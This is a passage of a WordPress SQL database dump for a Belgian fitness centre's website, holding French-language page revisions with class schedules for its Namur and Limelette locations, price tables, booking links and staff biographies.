href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:55:15', '2013-10-05 08:55:15', '', 11, 'http://www.crosstrainingcenter.be/11-revision-125/', 0, 'revision', '', 0),
(356, 1, '2013-10-05 08:55:37', '2013-10-05 08:55:37', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>17h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b><br>TRX</td>\r\n<td class=\"ttrx\"><b>11h</b><br>TRX</td>\r\n<td class=\"tglfe\"><b>11h</b><br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>18h30</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>18h15</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b><br>GLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b><br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h</b><br>RIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b><br>RIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b><br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"trip\"><b>19h30</b><br>RIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b><br>GLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b><br>TRX</td>\r\n<td class=\"tcardio\"><b>19h45</b><br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n\r\n<span style=\"text-decoration: underline; background:#F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background:#E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background:#A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:55:37', '2013-10-05 08:55:37', '', 11, 'http://www.crosstrainingcenter.be/11-revision-126/', 0, 'revision', '', 0),
(362, 1, '2013-11-04 17:20:34', '2013-11-04 17:20:34', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"tglfe\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-04 17:20:34', '2013-11-04 17:20:34', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(363, 1, '2013-11-04 17:21:08', '2013-11-04 17:21:08', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\"><img class=\"alignnone size-full wp-image-494\" alt=\"nouvelles seances CT\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\" width=\"900\" height=\"635\" /></a>\r\n\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'publish', 'closed', 'open', '', 'les-seances-namur', '', '', '2015-09-02 17:07:48', '2015-09-02 17:07:48', '', 0, 'http://www.crosstrainingcenter.be/?page_id=363', 0, 'page', '', 0),
(493, 3, '2015-09-02 16:58:59', '2015-09-02 16:58:59', '<p style=\"text-align: center;\"><img class=\" wp-image-491 aligncenter\" alt=\"Capture d’écran 2015-09-02 à 18.56.23\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/Capture-d’écran-2015-09-02-à-18.56.23-300x211.png\" width=\"900\" height=\"633\" /></p>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2015-09-02 16:58:59', '2015-09-02 16:58:59', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(496, 3, '2015-09-02 17:06:42', '2015-09-02 17:06:42', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\"><img class=\"alignnone size-full wp-image-494\" alt=\"nouvelles seances CT\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\" width=\"900\" height=\"635\" /></a>\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel:</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2015-09-02 17:06:42', '2015-09-02 17:06:42', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(364, 1, '2013-11-04 17:21:08', '2013-11-04 17:21:08', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2013-11-04 17:21:08', '2013-11-04 17:21:08', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(365, 1, '2015-04-21 08:49:04', '2015-04-21 08:49:04', '<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"sousmenu\">\n<div align=\"center\">\n\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\n\n</div>\n</div></td>\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"sousmenu\">\n<div align=\"center\">\n\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\n\n</div>\n</div></td>\n</tr>\n</tbody>\n</table>\n<h1></h1>\n<h1></h1>\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\n<img class=\"size-full wp-image-446 aligncenter\" alt=\"map\" src=\"http://www.crosstrainingcenter.be/map.png\" usemap=\"#imagemap\" width=\"300\" height=\"236\" />\n\n<map id=\"Map\" name=\"imagemap\"> <area coords=\"90,84,166,108\" shape=\"namur\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\" /> <area coords=\"174,121,233,132\" shape=\"limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\" /> </map>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-autosave-v1', '', '', '2015-04-21 08:49:04', '2015-04-21 08:49:04', '', 11, 'http://www.crosstrainingcenter.be/11-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(367, 1, '2013-11-04 17:24:23', '2013-11-04 17:24:23', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Formateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 